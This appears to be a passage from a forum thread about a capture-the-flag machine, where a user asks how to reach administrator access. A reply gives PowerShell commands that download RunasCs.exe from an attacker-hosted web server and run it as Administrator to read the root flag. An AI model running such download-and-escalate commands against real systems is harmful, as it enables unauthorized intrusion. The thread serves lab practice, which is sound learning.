should say `connected.`
if it hangs or gives server error, reset the machine and wait for all the services to be ready and try again i.e. nmap 25565 until you see it `open`

How to get into admin?
Yes noob question, but I've tried evil-winrm, runascs.exe, runas.exe and things, but can't get into admin with the password s67.....Xw, tried to reset the machine, nut nothing.

dont need to do all that, just do this:
Invoke-WebRequest -Uri http://<ipaddress>:8000/RunasCs.exe -OutFile "C:\windows\tasks\RunasCs.exe"
C:\windows\tasks\runascs.exe Administrator <password> "cmd /c type c:\Users\Administrator\Desktop\root.txt "
